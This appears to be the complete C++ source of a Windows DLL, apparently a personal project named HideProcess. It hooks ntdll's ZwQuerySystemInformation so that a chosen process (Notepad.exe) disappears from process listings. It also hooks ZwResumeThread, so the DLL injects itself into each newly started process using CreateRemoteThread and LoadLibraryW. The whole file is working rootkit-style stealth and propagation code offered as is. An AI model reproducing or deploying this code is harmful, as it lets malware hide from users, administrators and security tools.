1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279
| #include <windows.h> #include <ntstatus.h> #include <winternl.h>
#include <string> #include <vector> #include <tchar.h>
#pragma comment(linker,"/SECTION:.SHARED,RWS") #pragma data_seg(".SHARE") TCHAR g_szProcName[256] = {}; #pragma data_seg() extern "C" { __declspec(dllexport) void setProcName(LPCTSTR szProcName) { _tcscpy_s(g_szProcName, szProcName); } }
BYTE orgBytesA[14]; BYTE orgBytesB[14];
typedef NTSTATUS(WINAPI* PZwQuerySystemInformation)( ULONG SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength );
typedef NTSTATUS(WINAPI* PZwResumeThread)( HANDLE threadHandle, PULONG SuspendCount );
typedef struct _THREAD_BASIC_INFORMATION { NTSTATUS ExitStatus; PVOID TebBaseAddress; CLIENT_ID ClientId; KAFFINITY AffinityMask; KPRIORITY Priority; KPRIORITY BasePriority; } THREAD_BASIC_INFORMATION;
FARPROC getProc(std::string moduleName, std::string processName) { return GetProcAddress(GetModuleHandleA(moduleName.c_str()), processName.c_str()); }
bool hookByCode(std::string moduleName, std::string processName, PROC pFuncNew, PBYTE orgBytes) { BYTE jmpcode[14] = { 0xff,0x25,0x00,0x00,0x00,0x00 }; FARPROC orgFunc = getProc(moduleName, processName); PBYTE pOrgFunc = reinterpret_cast<PBYTE>(orgFunc); if (pOrgFunc[0] == 0xff && pOrgFunc[1] == 0x25) { return false; } DWORD dwOldProtect;
VirtualProtect(pOrgFunc, 14, PAGE_EXECUTE_READWRITE, &dwOldProtect);
memcpy(orgBytes, pOrgFunc, 14);
DWORD64 targetAddr = reinterpret_cast<DWORD64>(pFuncNew);
memcpy(&jmpcode[6], &targetAddr, 8); memcpy(pOrgFunc, jmpcode, 14);
VirtualProtect(pOrgFunc, 14, dwOldProtect, &dwOldProtect);
return true; }
bool unhookByCode(std::string moduleName, std::string processName, PBYTE orgBytes) { FARPROC orgFunc = getProc(moduleName, processName); PBYTE pOrgFunc = reinterpret_cast<PBYTE>(orgFunc);
if (!(pOrgFunc[0] == 0xff && pOrgFunc[1] == 0x25)) { return false; }
DWORD dwOldProtect;
VirtualProtect(pOrgFunc, 14, PAGE_EXECUTE_READWRITE, &dwOldProtect);
memcpy(pOrgFunc, orgBytes, 14);
VirtualProtect(pOrgFunc, 14, dwOldProtect, &dwOldProtect);
return true; }
NTSTATUS myZwQuerySystemInformation( ULONG SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength) { unhookByCode("ntdll.dll", "NtQuerySystemInformation", &orgBytesA[0]); PZwQuerySystemInformation pZwQuerySystemInformation = reinterpret_cast<PZwQuerySystemInformation>(getProc("ntdll.dll", "ZwQuerySystemInformation")); NTSTATUS status = pZwQuerySystemInformation(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength); if (status != STATUS_SUCCESS) { goto end; } if (SystemInformationClass == 5 && g_szProcName[0] != '\0') { PSYSTEM_PROCESS_INFORMATION pInfo = static_cast<PSYSTEM_PROCESS_INFORMATION>(SystemInformation); PSYSTEM_PROCESS_INFORMATION pNextInfo = reinterpret_cast<PSYSTEM_PROCESS_INFORMATION>(reinterpret_cast<PBYTE>(pInfo) + pInfo->NextEntryOffset); while (pNextInfo->NextEntryOffset) { if (!_tcsicmp(pNextInfo->ImageName.Buffer, g_szProcName)) { pInfo->NextEntryOffset += pNextInfo->NextEntryOffset; } pInfo = pNextInfo; pNextInfo = reinterpret_cast<PSYSTEM_PROCESS_INFORMATION>(reinterpret_cast<PBYTE>(pInfo) + pInfo->NextEntryOffset); } }
end: hookByCode("ntdll.dll", "ZwQuerySystemInformation", reinterpret_cast<PROC>(myZwQuerySystemInformation), &orgBytesA[0]); return status;
}
int inject(DWORD dwPID, LPCTSTR szDllPath) { HANDLE hProcess = 0, hThread = 0; if (!(hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID))) { _tprintf(_T("Open process %d failed\n"), dwPID); return FALSE; }
DWORD dwBufSize = (DWORD)(_tcslen(szDllPath) + 1) * sizeof(TCHAR);
LPVOID pBuf = VirtualAllocEx(hProcess, NULL, dwBufSize, MEM_COMMIT, PAGE_READWRITE); if (pBuf == NULL) { CloseHandle(hProcess); return FALSE; }
if (!WriteProcessMemory(hProcess, pBuf, (LPVOID)szDllPath, dwBufSize, NULL)) { VirtualFreeEx(hProcess, pBuf, 0, MEM_RELEASE); CloseHandle(hProcess); return FALSE; }
HMODULE hKernel32 = GetModuleHandle(_T("kernel32.dll")); if (hKernel32 == NULL) { VirtualFreeEx(hProcess, pBuf, 0, MEM_RELEASE); CloseHandle(hProcess); return FALSE; }
LPTHREAD_START_ROUTINE pThreadProc = (LPTHREAD_START_ROUTINE)GetProcAddress(hKernel32, "LoadLibraryW"); if (pThreadProc == NULL) { VirtualFreeEx(hProcess, pBuf, 0, MEM_RELEASE); CloseHandle(hProcess); return FALSE; }
hThread = CreateRemoteThread(hProcess, NULL, 0, pThreadProc, pBuf, 0, NULL); if (hThread == NULL) { VirtualFreeEx(hProcess, pBuf, 0, MEM_RELEASE); CloseHandle(hProcess); return FALSE; }
WaitForSingleObject(hThread, 1500);
CloseHandle(hThread); VirtualFreeEx(hProcess, pBuf, 0, MEM_RELEASE); CloseHandle(hProcess);
return TRUE; }
NTSTATUS myZwResumeThread( HANDLE threadHandle, PULONG SuspendCount) { typedef NTSTATUS(NTAPI* ZwQueryInformationThread_t)( HANDLE ThreadHandle, DWORD ThreadInformationClass, PVOID ThreadInformation, ULONG ThreadInformationLength, PULONG ReturnLength OPTIONAL ); THREAD_BASIC_INFORMATION tbi; FARPROC pqit = getProc("ntdll.dll", "ZwQueryInformationThread"); NTSTATUS statusThread = reinterpret_cast<ZwQueryInformationThread_t>(pqit)(threadHandle, 0, &tbi, sizeof(tbi), NULL); DWORD dwPid = reinterpret_cast<DWORD>(tbi.ClientId.UniqueProcess); DWORD dwPrevPid = 0; if (dwPid != GetCurrentProcessId() && dwPid != dwPrevPid) { dwPrevPid = dwPid; inject(dwPid, L"C:\\Users\\a2879\\source\\repos\\HideProcess\\x64\\Debug\\HideProcess.dll"); }
unhookByCode("ntdll.dll", "ZwResumeThread", &orgBytesB[0]); PZwResumeThread pZwResumeThread = reinterpret_cast<PZwResumeThread>(getProc("ntdll.dll", "ZwResumeThread")); NTSTATUS status = pZwResumeThread(threadHandle, SuspendCount);
hookByCode("ntdll.dll", "ZwResumeThread", reinterpret_cast<PROC>(myZwResumeThread), &orgBytesB[0]); return status;
}
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { setProcName(L"Notepad.exe"); std::string curProc(MAX_PATH, '\0'); char* p = nullptr; GetModuleFileNameA(nullptr, &curProc[0], curProc.size()); p = const_cast<char*>(strrchr(curProc.c_str(), '\\')); if (p != nullptr && !_stricmp(p + 1, "DLL_inject.exe")) { return true; } switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: hookByCode("ntdll.dll", "ZwQuerySystemInformation", reinterpret_cast<PROC>(myZwQuerySystemInformation), &orgBytesA[0]); hookByCode("ntdll.dll", "ZwResumeThread", reinterpret_cast<PROC>(myZwResumeThread), &orgBytesB[0]); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }
|